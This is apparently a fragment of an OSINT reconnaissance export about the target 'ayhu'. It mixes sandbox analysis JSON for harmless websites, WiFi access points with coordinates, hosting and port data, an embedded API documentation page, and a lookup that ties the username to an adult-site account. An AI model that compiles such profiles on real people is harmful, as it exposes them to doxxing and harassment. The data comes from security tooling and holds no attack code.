"inorganik.github.io"\n "k.chasingglitters.com"\n "kyleismyfavorite.com"\n "signaturewithatwist.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\throttle_store.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\local state"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\shopping.js]- [targetUID: 00000000-00001340]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00001340]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: N/A]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\1340_2106655350\\edge_driver.js]- [targetUID: 00000000-00001340]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\edge_driver.js]- [targetUID: 00000000-00001340]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\1340_2106655350\\vendor.bundle.js]- [targetUID: 00000000-00001340]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00001340]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\auto_open_controller.js]- [targetUID: 00000000-00001340]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00001340]\n "000013.ldb" has type "data"- [targetUID: N/A]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\1340_2106655350\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00001340]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\edge_checkout_page_validator.js]- [targetUID: 00000000-00001340]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00001340]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\product_page.js]- [targetUID: 00000000-00001340]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUI | 185.199.108.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | remraz wd pro 2g (Net ID: 00:00:C0:01:7B:3F) | 52.3759, 4.8975 |
| 2023-05-12 03:24:22 | Linked URL - Internal | No | Web Spider | 1 | 0 | 2 | 0 | None | https://ayhu.xyz/ | http://ayhu.xyz/ |
| 2023-05-12 02:55:52 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://fakeyou.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"fakeyou.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"fakeyou.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar207B.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:80"\n "104.196.30.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_b04_IE_EarlyTabStart_0xeac_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b04_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_b04_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b04_ConnHashTable<2820>_HashTable_Mutex"\n "IsoScope_b04_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2820"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b04_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab207A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpfakeyou.com" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003088]\n "_87BE6B54-B749-11ED-AC3C-080027FE9315_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "Cab207A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab207A.tmp]- [targetUID: 00000000-00003088]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._7CF0C385-B749-11ED-AC3C-080027FE9315_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFDAD5417A26E3E872.TMP" has type "data"- Location: [%TEMP%\\~DFDAD5417A26E3E872.TMP]- [targetUID: 00000000-00002820]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "42VPP0D5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\42VPP0D5.txt]- [targetUID: 00000000-00002820]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002820]\n "OPUDGCZY.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OPUDGCZY.txt]- [targetUID: 00000000-00002820]\n "Tar207B.tmp" has type "data"- Location: [%TEMP%\\Tar207B.tmp]- [targetUID: 00000000-00003088]\n "HVIM856A.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HVIM856A.txt]- [targetUID: 00000000-00002820]\n "J0B825KS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J0B825KS.txt]- [targetUID: 00000000-00002820]\n "33YQJ8LX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\33YQJ8LX.txt]- [targetUID: 00000000-00002820]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "ZMP638A7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZMP638A7.txt]- [targetUID: 00000000-00002820]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: fakeyou.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://fakeyou.com/"\n Pattern match: "http://fakeyou.com"\n Heuristic match: "fakeyou.com"\n Heuristic match: "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: fakeyou.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63fdd56ace3ff76e250d8f82', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'104.196.30.220', u'104.196.30.220'], u'sha256': u'2a96acb6a11ab86bced4aba33d700808a6df7486ededb0db3e75f1d8e | 104.196.30.220 |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | Germany | 207.154.228.169 |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-experiments.github.io | 185.199.111.153 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:04:09:0C) | 37.780462,-122.390564 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TEO Network Enterprise (Net ID: 00:01:24:F0:B7:E1) | 37.7813933,-122.3918002 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pornhub Users (Category: XXXPORNXXX)
https://www.pornhub.com/users/ayhu | ayhu |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Patreon | nwapi.battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom67E1E4 (Net ID: 00:0C:F6:67:E1:E4) | 50.8897, 6.0563 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:0E:F4:FC) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F2:68:C6) | 37.7813933,-122.3918002 |
| 2023-05-12 03:23:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.13:80 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Chili Bean Cafe (Net ID: 00:02:61:19:70:71) | 34.0544, -118.244 |
| 2023-05-12 02:57:52 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/twbs/bootstrap/blob/main/license)*/:root', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 14, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'christitus.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2560:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2560:120:WilError_01"\n "Local\\SM0:2560:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:2560:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:420:304:WilStaging_02"\n "Local\\SM0:420:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6500:304:WilStaging_02"\n "Local\\SM0:6500:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "msedge.exe" with commandline "--type=crashpad-handler "--user-data-dir=%LOCALAPPDATA%\\Microsof ..." (UID: 00000000-00006356), Spawned process "msedge.exe" with commandline "--type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAA ..." (UID: 00000000-00000420), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=network.mojom.NetworkService - ..." (UID: 00000000-00006500), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=storage.mojom.StorageService - ..." (UID: 00000000-00006936), Spawned process "msedge.exe" with commandline "--type=renderer --disable-client-side-phishing-detection --displ ..." (UID: 00000000-00002696), Spawned process "msedge.exe" with commandline "--type=renderer --disable-client-side-phishing-detection --displ ..." (UID: 00000000-00005140), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=asset_store.mojom.AssetStoreSe ..." (UID: 00000000-00004120), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en ..." (UID: 00000000-00004536), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en ..." (UID: 00000000-00002404), Spawned process "msedge.exe" with commandline "--type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu ..." (UID: 00000000-00006928), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en ..." (UID: 00000000-00006236), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en ..." (UID: 00000000-00004364), Spawned process "msedge.exe" with commandline "--type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en ..." (UID: 00000000-00005160)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-21', u'name': u'Launches a browser', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Launches browser "msedge.exe" (UID: 00000000-00006356)\n Launches browser 